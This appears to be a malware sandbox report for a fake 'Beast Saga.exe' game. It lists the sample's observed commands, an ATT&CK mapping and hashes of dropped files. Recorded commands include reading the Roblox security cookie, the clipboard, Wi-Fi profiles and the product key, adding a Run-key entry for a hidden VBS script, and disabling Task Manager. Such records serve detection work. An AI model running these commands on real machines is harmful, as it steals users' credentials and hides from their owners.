C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:11540

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7560

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7332

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7236

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
PID:7208

C:\Windows\system32\tasklist.exe
tasklist
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:11448

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
1⤵
PID:3344

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
1⤵
PID:11888

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
1⤵
PID:5548

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
1⤵
PID:6828

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
1⤵
PID:5356

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:7616

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
1⤵
PID:4400

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
1⤵
PID:7292

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
1⤵
PID:1676

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
1⤵
PID:6932

C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\AppData\Roaming\dTIH8ADMxfxv.vbs
1⤵
PID:5604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:7256

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan show profile
1⤵
PID:9644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1164

C:\Windows\system32\tasklist.exe
tasklist
1⤵
PID:6880

C:\Windows\system32\attrib.exe
"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_XkIyAG.vbs
1⤵
- Views/modifies file attributes
PID:11352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\saluttsUBG.ps1" -RunAsAdministrator
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5400

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_XkIyAG /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_XkIyAG.vbs /f
1⤵
- Adds Run key to start application
PID:10104

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4804

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
1⤵
PID:8564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dQO6oCgQvhNT_temp.ps1"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:7912

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
1⤵
PID:9084

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
1⤵
PID:1092

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
1⤵
PID:9572

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
1⤵
PID:7932

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
1⤵
PID:6064

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
1⤵
PID:6308

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
1⤵
PID:8104

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
1⤵
PID:6532

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
1⤵
PID:10448

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
1⤵
PID:5384

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
1⤵
PID:5916

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7804

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
1⤵
PID:5380

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
1⤵
PID:5216

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
1⤵
PID:7944

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
1⤵
PID:10332

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
1⤵
PID:3192

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
1⤵
PID:10900

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
1⤵
PID:3592

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
1⤵
PID:11932

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
1⤵
PID:11904

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

Filesize
1KB

MD5
64f5391eaf38751c519c6f4f09ff83a6

SHA1
11a0f7710239b4cfe32ad67820b0a5410acefba0

SHA256
ac1a759258ba1855fdc7718dbb656925f9cfefd22be0eced729b1051eb830405

SHA512
4453824a18e0e7de1fe06fc2a47089d9d03892a8ebc77a7089f48b32faa808bdade04c44b1348f0fd6951957999072dbe0f7450bdc88525fbdb521daf59df780

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

Filesize
1KB

MD5
1285b1bd1aae1b5377842d6072a57ebc

SHA1
d642d31792990f7744cd2c7a1a8bb3be43a3cd06

SHA256
507f91ae2916e4321cd96cdd94f3491c826feb769a32db43f8a7483edf89a4d6

SHA512
353b2cef70923f0d2ac9b18f1f92d9396b64d64a01f13db493eff7be4a1297d89deccc6ac4a47d264d5685b4e928209010924516da76a4ce9c5767bf0b913b36

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

Filesize
1KB

MD5
f0f11cd478cc44d518c16820ede9d253

SHA1
cfaf8d2e071f2ade0894578e5b44e02032d27be4

SHA256
321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb

SHA512
ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

Filesize
1KB

MD5
e595e9d6d61da2e8b0912099f4da19ad

SHA1
46e7bfe519c5685e0711b64937f76b0d287313aa

SHA256
e57c5827484cf603e6f2d33baf9bb059cb4eeb2a4a23a9fd43b059dcc9831cbe

SHA512
a045944a100adf06c6426bd8e5fc721ce9b69b33f72a9993b944c435dfac07245f961c4e506cd0f81e665d4f27e2b6d967d8266f2c3bd120efc1fc3aa95542d2

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

Filesize
978B

MD5
04c23766134b234e85cc537b2162efb1

SHA1
45c48d9ca30a4580a682f025cc66331e49f6f158

SHA256
f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900

SHA512
d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

Filesize
31KB

MD5
239aa351e7fe8ead18c02e0f64b1f7a9

SHA1
f3d24e96ed15915cfa9cbea25e0338f07e8f9cd3

SHA256
b4ad11beff370e6a5152d54909243e177d52114f9b9e532adbdd2db65741417d

SHA512
e29f192d306045b54a4e96faeadb25ad2f3cf6a24dc126732e30ce2a0abfcff0038a2fdcad0d3f121a6c8eeee40027dedc638f3102683aa2d253b5b601e9ca2c

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

Filesize
790B

MD5
42ac88deb5c3cfc02fdc1c27319ee067

SHA1
97b1addf35159800b90743fcfbb5505e80f6eb82

SHA256
28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb

SHA512
77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
561ad4794e22ab68a6811d88e43d6c06

SHA1
3dcd045d3e0fb917c67ec36cfe102e50a9b3c41c

SHA256
250e7bac495dbd6e656b75106b03b7e741c7508097fbd32cf78627061b7ceade

SHA512
00273fa6bf017c674a48e3b9b4757f083540846de66abf8c2b8fc878d38475cf284f3ebefc597600a393ec18c8027a6628e6698ab5a3086fe60e1aa6ef733c96

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c2a26a05ae505fbff9a55a60fb799572

SHA1
c4d95c942bde11ee5ff563d521ef09a960ad5018

SHA256
12b045b5bfe391b1466e68e940d403d453607bbbf681af9545b7b1a7050f5c61

SHA512
1054a11a5357251a0177ac45efd4344c8204d35dd709fbcf6d91459d0c62e191b46f0006b75cdf60971391e5157051c7c8c056012df25e27bc69a1570ec1586e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
35f4f8a828b2c1bfc34f8d187d5e47f0

SHA1
8b505cef0e7534ca76063a9c19c9b351735c81f6

SHA256
ef5ecfe7564fd1ad9dce1726f64b29f4a6e3f0f194f974a646f132591b965ae7

SHA512
16596af8eedbb62db244df5fb86e9d713a17fc7a4551a4a50a3ee6f3a19cea58b415bc5895e2b4311172bdc850e6f6f1b2cc3c440816f03175e0a58f930c3941

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1e4a50bf9f984f70ac4ea83f3b0859f7

SHA1
d548100fcc579e79a75bb8cc2b3488a1da32ae3f

SHA256
9f757b845846be106a1802bb1cdd643c46dc96d8e7efa7ab3480c41cd55c7a61

SHA512
cde3bb5d44014848dbf4fef71682d3a4db62561ef5bc3a67d22573029169f2b8488d8b991913ff147a8a2d71f89b1b4d2e6f789dd1da21b547913080d9196549

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\1cbe2515-6f5a-48e5-9df7-5124949df244.tmp.node

Filesize
159KB

MD5
caa5165616a9be0c60584054eac517dd

SHA1
0e0848cc8aca6a6d9907c132ee6f3f3f4194f4fc

SHA256
e4a4830224f8cbbfb8f2bf2f96f21206c9067dba98196f11b34c8c2a859d8ef2

SHA512
52b20720009d1385951514119a1aa9b0a729a2080f9c9c3d25945b0d82863ace2eaad9d76f0801a75b590dd10b60676ddb61c045b77d2254d48c1e50329acf49

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
139.5MB

MD5
b4f43d5dd1c334c8f7bf366f9fae0f41

SHA1
e92e57a26e999a2ab4be63c6ba725163bc2eef7a

SHA256
a75e7ea212dc81641d2bbecadfbb18c1a39d790e9a0cfb001f2ee77264477002

SHA512
6a53315a9ddaad40329eadf2814d2389c84035dfd4a52e7bcb213385146a33d146e9f61d8cf5ee97250a220f12deb2f20f4f93593608967f4a57ce802efb65b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
810KB

MD5
a9f00e695015e1fe87d605d6fab88556

SHA1
172ca5c5a8d9d8d4fd5ff44f235b3294fa9eed21

SHA256
1e484d369087bfb6e0892fb362aeb56e6673864034a30ee71c2a00714f1da02a

SHA512
8ffa6cce420b647352d472aa6cd9a285eb802f4d9f252efa4a9b6b1ccfaf0143cc5ef6384a64264ff2cc8d959796fbbfe7ee17c5a5a90f1136d7146e42267266

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
162KB

MD5
869787402c9450bcded820f676b03d4c

SHA1
0810bfe02388872a474e1bcb3d4da808aad87feb

SHA256
4456140f6de0d1f30cfed04a15cb55cde3e2997cdd29ae27bc2962921d57f1ef

SHA512
140041ac6ca51d065658cf72b968a1e2af081e75365b606ee2734a5b9840c710f2977640992b3ea6e01d16079832441db4eb71ba7659124e74e45100af182ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
92KB

MD5
5a50545226e16f1cd55076c10643599c

SHA1
33af2aae5466a2c8ab796ea044322004bfa11418

SHA256
9825c6f0e2d8a8df7f7ba60793fab19fc37efdf7346f628e5540afc482c2c228

SHA512
90c64f0fb406899e191e23709f8d24b1eb8b235bb9269257a5603577424d01bd440eca5abfecb88f58809a89e053a983732ef088ccf429c2dc398a10720e1220

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
81KB

MD5
2c3885e2a2632c562da3a8f5013277d1

SHA1
43db3aa1f4d4b41ddb71240540e8b4826d294c72

SHA256
5547cd74113ca57fa35849d974b449397c83e7d4158cd05f146994326ce407e9

SHA512
337236f6816afafb9f1a868d39cff0b8c78fd7c8d5095b090648b55bdf815ebe5855c2930affbed9f18ce98ba94f4aa109a9d836cf75b7ee9b38b5b3f6a80157

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\Beast Saga.exe

Filesize
1.1MB

MD5
f8fbcaf5e1da3556ce9cc051054f6cdb

SHA1
e242c1a1fe93876795648f5c8743e1d0407e9e54

SHA256
e9a0169546793986ffdbac987910d2cc4da52bc2ae53855df473cad5bb6d44dd

SHA512
e270a98ac857c6b6fb9c1502565d882c7266303cf7bb8fa240c4d23696f3de36b40b27726d110646f8343ab59fae0abac8edbe037129f4b87b7874d638ee18f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\D3DCompiler_47.dll

Filesize
126KB

MD5
127cbcc4007dd684d3a0e6f5946478ec

SHA1
5ad5d8be695913ee26e54139581ccd3961945d0a

SHA256
de5b92d3e00bbe4a39ef20d096620978321448b487808f1791cad6718289ac2e

SHA512
f66470daaccd0e150c3e1f462dd451cf5d0eaeb788541329d4aafd3df75facd0ac8f931739959784fcd62f0b810272a8f24448a469e5ebfe50f011876fc5885a

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\chrome_100_percent.pak

Filesize
87KB

MD5
d9865284860850e860012cf1dc437e3d

SHA1
6bd8fc1bb59d2ef4caa29c2be55f59d09941475b

SHA256
8b3cc39bdf417fe8c2e5482f131754fb93c8383b7deb770b53661b678f1c3d83

SHA512
40022dc0b710aee2a46cebbfe1f45d38c63679e5d43b54e249bfa5158c53eb6428859e8ac595b69833805c6b3a996c6ec7b404cc7fe2cf4f23c87c3097df0357

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\chrome_200_percent.pak

Filesize
1KB

MD5
46116b23d49c055b76cb608abd71b3c8

SHA1
56c9c21b655821d34f7d1bbecfd3ed818fe3faa7

SHA256
654b02641210f2f7ea638652acaef737a56d0598d4134e435b864bee7a79ef91

SHA512
e435f280c5abd2d089fdd19244395060669a8c1b3f5ed57de07766b2f2a34aff64bd32548c3a398297f7c36936616d0a3ab86ce7f3e65a6c83a26a3f80e10a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\d3dcompiler_47.dll

Filesize
30KB

MD5
a6acfeef7cbde7c8e2f87739db936946

SHA1
47ea159edf6b438f86d713db2ea6f91971ee9310

SHA256
18c654fbcca1575df3308f8024a636c52e22322f38e400514a41adb0a84a41ef

SHA512
3c26bf867ba60359786ef974183685fdbb1042970f1c4880788bfd4b8c2910a0506cb4ccb2d8d8d181a0445d6b0f7fda0c082258176e72d98cbb10bfd3d197e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\ffmpeg.dll

Filesize
2.6MB

MD5
c3842fb3087cdcdb04020ac38683c289

SHA1
329dbcd4a1c79b891b200f11eb50194b85c493bc

SHA256
e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133

SHA512
069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\ffmpeg.dll

Filesize
191KB

MD5
c6f6a33a9e39fd36c367e908c8ef07be

SHA1
b99db4639b2ce96bfec720f959bca365944c9fe9

SHA256
5213adc411d87ab52244da9f42c9098050e90be574b816df75b53b1774ddb363

SHA512
c7adf8d571a98e10d5a2e7c0eade085bd811e644a0f1068c6b9649e629fa69cf2ea63f9ba82893e4000a1966edd70d8988385657d329cba47aa429775a9a1499

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\ffmpeg.dll

Filesize
5KB

MD5
a285f7d165d681545895be7c438a3c3b

SHA1
e646882635ba988381ffb458e7f07c59b3369f3c

SHA256
82eca7af524b2352593af0c21a15869aaf1ff4c0380b8cc9ffcf8ad293cb3ebc

SHA512
fb0ac4052d0537c098f09821677292e58ecc33863d2dd36b241e4076b1133f84bd4a7a6047e8573e0ec5b3256e40508cc07b5fc60db3aacc3d43fbf4f309cecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\ffmpeg.dll

Filesize
51KB

MD5
f978d197b6e246f2a9b2f4646dacf9ff

SHA1
0c3dedd6b0a3a5aa7449cf11afe691f8cb83fc0a

SHA256
5472f96b08541ec7751edba928263513e21e4d6274453c5a4ef46b5dd113ccd1

SHA512
ca5eca57029805b4cb272056b609a89be1a553be5bfad5c6bc45e594df9c623e928d9add3d92e7e913807e5169d7a3401c22356d176aee736306ba77d55fbfe9

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\ffmpeg.dll

Filesize
86KB

MD5
14dc94c6890bb72c15aa225ff35c09ea

SHA1
385445ff5dcac2225937ad510a4f03a1b7fbfcaf

SHA256
6b562d969caf5c25b4f903628db84fa71e24572aa8458d5f6bbfa7b34f350775

SHA512
ee8b0277b95dbefb75e1a31c2076c24377fb6c60d52914990c59d001e6c0020ad7b50c88cf905d35a5f63de2a28cac4e5ae88f8445e22341f8d17bafe7011ac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\icudtl.dat

Filesize
43KB

MD5
d002e855bea0b6b162e5549cee6c2cbc

SHA1
44938968b1bf0e3684e1adcd9f4a8b33277d219e

SHA256
6861a83c857ebdff1d8e46640ddd6f51845d788665074df86c4c350636344330

SHA512
0519b8200192bb2ef3437d110cc570e564d39a17197fa4374ded05ae30e30c2a42a3b959b3ecf413e32121515844fb0d647391f64d84572598d00322394e1d0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\libEGL.dll

Filesize
28KB

MD5
81fa0eeb1851836767d68247b99431db

SHA1
7f793f161d8748ba5d3697d1111ea8c4dcb923a5

SHA256
e607204e852ad067b23d485b874fb1ab0fae6bbf9f1c1efa4a1f9213ce699407

SHA512
8d6ab148b84cdb1ca5eeb64175f506adeb0e24d53e67640c1d69cdac64a2d144f1b4f7ee2b8093244f3e933f1bcb1ffa8883683bb51b23ae12b4b664b0c40317

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\libGLESv2.dll

Filesize
88KB

MD5
ecedfb9d7a39b3525aff69f1b09f9416

SHA1
de12f8f40659eda5957405dad1be8399fb257209

SHA256
f373898b8f1846ee79fdfb56606f5a58f085b426511d18688f7da91c9d231936

SHA512
464a2feb5c02c3151ccf287ac0f9d0d4ca3760e498b59cf656918ed54f1a423648d3967da0d2d9f73f395640a5f58051cb49c7eb2fab141b3e8a1cad15ba5210

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\libegl.dll

Filesize
53KB

MD5
1acbc16a6629a1452eadfccb0dc5d008

SHA1
0f7972fd74b141e3de5bdc221a8a88d5f54f64c6

SHA256
4c46468554e21a60427123f3e54a3c7f813af3d062583f7e8ff71e8933b7d6df

SHA512
9ed684aa6c1166b20f7af58e41fac9a7d93200745186e162653b8f938b38e1f99c5d1bdd23033dc2a4878c247be31cf6cb767495be406301825dfb76223a44ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\libglesv2.dll

Filesize
117KB

MD5
b343be7ebaa61e0614d00bfe5f30b063

SHA1
194f7bb6d3957241966a07d0c0f510f1b06ffa74

SHA256
412fc385b9f8282185ae5352bdcbfec5d67271c2d2b8113b03ae0df9d7924df6

SHA512
e24a9545ac27eec33b3d0545538c6db1a1842ee246ab6faf92699f75a58738cd6edd3e50920638e3454b0a50ede5c95ae75a32a5be33946bf8696cb13e7c6151

Download Submit
C:\Users\Admin\AppData\Local\Temp\2bIrywvMmpNGWTWi4VLYnJjQOnl\locales\bn.pak

Filesize
42KB

MD5
1111d751c32352fb3a9c82e6dcb889a0

SHA1
fb546674665810cd6f03aa5dc11daaed44d1322b

SHA256
